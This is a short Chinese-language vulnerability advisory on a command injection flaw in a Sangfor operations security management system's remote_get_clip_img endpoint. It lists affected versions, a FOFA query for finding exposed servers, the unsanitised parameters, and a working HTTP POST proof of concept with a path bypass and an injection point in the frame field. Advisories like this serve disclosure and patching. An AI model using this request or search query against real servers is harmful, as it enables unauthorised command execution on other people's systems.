漏洞简介
深信服运维安全管理系统 remote_get_clip_img 接口存在远程命令执行漏洞。攻击者可通过构造恶意的请求,利用该漏洞在目标服务器上执行任意命令,从而可能导致服务器被完全控制、敏感数据泄露等严重后果。影响范围包括所有运行存在该漏洞版本的深信服运维安全管理系统的服务器。
影响版本
低于 3.0.12 20241106
fofa语法
body="/fort/login" && header="FORTSESSIONID"
漏洞分析
看下 com.sbr.fort.subforeign.controller.audit.FortAuditLogSubwayController#remoteGetClipImg的实现逻辑

参数 sid、dirno 和 frame 直接拼接进 cmd 中进行命令执行。只需要满足 sid的长度超过10即可进行命令注入利用。
漏洞复现

POC
POST /fort/subforeign;help/audit/remote_get_clip_img HTTP/1.1
Host: sangfor_osm.mrxn.net
Content-Type: application/x-www-form-urlencoded
sid=112313123131231123123&dirno=1&frame=nonexistent;RCE_POC



